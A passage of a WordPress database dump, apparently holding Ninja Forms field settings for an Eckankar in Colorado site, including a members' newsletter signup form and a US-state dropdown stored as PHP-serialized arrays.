Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"ECK Center Coordinator\";s:5:\"value\";s:22:\"ECK Center Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Vahana Leader\";s:5:\"value\";s:13:\"Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8693,178,'field_label','HTML','field_label','HTML'),(8694,178,'field_key','html_1550094026658','field_key','html_1550094026658'),(8695,179,'field_label','First Name','field_label','First Name'),(8696,179,'field_key','firstname_1550094074971','field_key','firstname_1550094074971'),(5108,174,'key','listselect_52','key','listselect_52'),(5109,174,'container_class','','container_class',''),(5110,174,'parent_id','16','parent_id','16'),(5111,175,'objectType','Field','objectType','Field'),(5112,175,'objectDomain','fields','objectDomain','fields'),(5113,175,'editActive','','editActive',''),(5114,175,'order','10','order','10'),(5115,175,'type','textarea','type','textarea'),(5116,175,'label','Enter Your Message Here','label','Enter Your Message Here'),(5117,175,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5118,175,'label_pos','above','label_pos','above'),(5119,175,'default_value','','default_value',''),(5120,175,'textarea_rte','0','textarea_rte','0'),(5121,175,'textarea_media','0','textarea_media','0'),(5122,175,'disable_rte_mobile','0','disable_rte_mobile','0'),(5123,175,'input_limit','','input_limit',''),(5124,175,'input_limit_type','char','input_limit_type','char'),(5125,175,'calc_auto_include','0','calc_auto_include','0'),(5126,175,'num_sort','0','num_sort','0'),(5127,175,'admin_label','','admin_label',''),(5128,175,'show_help','0','show_help','0'),(5129,175,'help_text','','help_text',''),(5130,175,'show_desc','0','show_desc','0'),(5131,175,'desc_pos','none','desc_pos','none'),(5132,175,'desc_text','','desc_text',''),(5133,175,'element_class','','element_class',''),(5134,175,'required','1','required','1'),(5135,175,'default','','default',''),(5136,175,'key','textarea_53','key','textarea_53'),(5137,175,'placeholder','','placeholder',''),(5138,175,'container_class','','container_class',''),(5139,175,'manual_key','','manual_key',''),(5140,175,'parent_id','16','parent_id','16'),(17493,623,'key','html_1663797829803','key','html_1663797829803'),(17492,623,'element_class','','element_class',''),(17491,623,'container_class','','container_class',''),(17490,623,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17488,623,'label','HTML','label','HTML'),(17489,623,'type','html','type','html'),(17487,623,'idAttribute','id','idAttribute','id'),(17486,623,'order','8','order','8'),(17485,623,'editActive','','editActive',''),(17484,622,'key','html_1663797799791','key','html_1663797799791'),(17483,622,'element_class','','element_class',''),(17482,622,'container_class','','container_class',''),(17481,622,'default','','default',''),(5158,177,'objectType','Field','objectType','Field'),(5159,177,'objectDomain','fields','objectDomain','fields'),(5160,177,'editActive','','editActive',''),(5161,177,'order','12','order','12'),(5162,177,'type','submit','type','submit'),(5163,177,'label','Submit','label','Submit'),(5164,177,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5165,177,'show_help','0','show_help','0'),(5166,177,'help_text','','help_text',''),(5167,177,'show_desc','0','show_desc','0'),(5168,177,'desc_pos','none','desc_pos','none'),(5169,177,'desc_text','','desc_text',''),(5170,177,'processing_label','Processing','processing_label','Processing'),(5171,177,'element_class','','element_class',''),(5172,177,'key','submit_55','key','submit_55'),(5173,177,'container_class','','container_class',''),(5174,177,'parent_id','16','parent_id','16'),(5175,178,'objectType','Field','objectType','Field'),(5176,178,'objectDomain','fields','objectDomain','fields'),(5177,178,'editActive','','editActive',''),(5178,178,'order','1','order','1'),(5179,178,'type','html','type','html'),(5180,178,'label','HTML','label','HTML'),(5181,178,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - MEMBERS Newsletter Signup</span></span></span></strong></span></h3>\nGet the latest news from around the state!','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - MEMBERS Newsletter Signup</span></span></span></strong></span></h3>\nGet the latest news from around the state!'),(5182,178,'container_class','','container_class',''),(5183,178,'element_class','','element_class',''),(5184,178,'key','html_1550094026658','key','html_1550094026658'),(5185,178,'drawerDisabled','','drawerDisabled',''),(5186,178,'parent_id','17','parent_id','17'),(5187,179,'objectType','Field','objectType','Field'),(5188,179,'objectDomain','fields','objectDomain','fields'),(5189,179,'editActive','','editActive',''),(5190,179,'order','2','order','2'),(5191,179,'type','firstname','type','firstname'),(5192,179,'label','First Name','label','First Name'),(5193,179,'key','firstname_1550094074971','key','firstname_1550094074971'),(5194,179,'label_pos','default','label_pos','default'),(5195,179,'required','1','required','1'),(5196,179,'default','','default',''),(5197,179,'placeholder','','placeholder',''),(5198,179,'container_class','','container_class',''),(5199,179,'element_class','','element_class',''),(5200,179,'admin_label','','admin_label',''),(5201,179,'help_text','','help_text',''),(5202,179,'custom_name_attribute','fname','custom_name_attribute','fname'),(5203,179,'personally_identifiable','1','personally_identifiable','1'),(5204,179,'drawerDisabled','','drawerDisabled',''),(5205,179,'parent_id','17','parent_id','17'),(5206,180,'objectType','Field','objectType','Field'),(5207,180,'objectDomain','fields','objectDomain','fields'),(5208,180,'editActive','','editActive',''),(5209,180,'order','3','order','3'),(5210,180,'type','lastname','type','lastname'),(5211,180,'label','Last Name','label','Last Name'),(5212,180,'key','lastname_1550094079880','key','lastname_1550094079880'),(5213,180,'label_pos','default','label_pos','default'),(5214,180,'required','1','required','1'),(5215,180,'default','','default',''),(5216,180,'placeholder','','placeholder',''),(5217,180,'container_class','','container_class',''),(5218,180,'element_class','','element_class',''),(5219,180,'admin_label','','admin_label',''),(5220,180,'help_text','','help_text',''),(5221,180,'custom_name_attribute','lname','custom_name_attribute','lname'),(5222,180,'personally_identifiable','1','personally_identifiable','1'),(5223,180,'parent_id','17','parent_id','17'),(5224,181,'objectType','Field','objectType','Field'),(5225,181,'objectDomain','fields','objectDomain','fields'),(5226,181,'editActive','','editActive',''),(5227,181,'order','4','order','4'),(5228,181,'type','email','type','email'),(5229,181,'label','Email','label','Email'),(5230,181,'key','email_1550094081455','key','email_1550094081455'),(5231,181,'label_pos','default','label_pos','default'),(5232,181,'required','1','required','1'),(5233,181,'default','','default',''),(5234,181,'placeholder','','placeholder',''),(5235,181,'container_class','','container_class',''),(5236,181,'element_class','','element_class',''),(5237,181,'admin_label','','admin_label',''),(5238,181,'help_text','','help_text',''),(5239,181,'custom_name_attribute','email','custom_name_attribute','email'),(5240,181,'personally_identifiable','1','personally_identifiable','1'),(5241,181,'parent_id','17','parent_id','17'),(5242,182,'objectType','Field','objectType','Field'),(5243,182,'objectDomain','fields','objectDomain','fields'),(5244,182,'editActive','','editActive',''),(5245,182,'order','5','order','5'),(5246,182,'type','liststate','type','liststate'),(5247,182,'label','US States','label','US States'),(5248,182,'key','liststate_1550094094681','key','liststate_1550094094681'),(5249,182,'label_pos','default','label_pos','default'),(5250,182,'required','1','required','1'),(5251,182,'options','a:55:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"- Select State -\";s:5:\"value\";s:0:\"\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"6\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"7\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 